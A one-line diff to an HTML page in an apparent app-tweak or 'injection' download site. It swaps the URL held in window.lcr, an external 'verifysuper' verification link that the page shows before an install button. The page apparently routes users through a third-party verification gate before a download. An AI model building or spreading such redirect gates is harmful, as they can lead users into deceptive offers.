--- a/itweakvip/OGInject/s3.html
+++ b/itweakvip/OGInject/s3.html
@@ -134,7 +134,7 @@
         id("app_name").innerHTML = name;
         id("app-caption-title").innerHTML = name;
 
-        window.lcr = "https://www.verifysuper.com/cl.php?id=192cc019d3edcfa29b01487b5d77b4f5";
+        window.lcr = "https://verifysuper.com/cl/i/klpd5q";
         id("install").style.display = "block";
     }
 
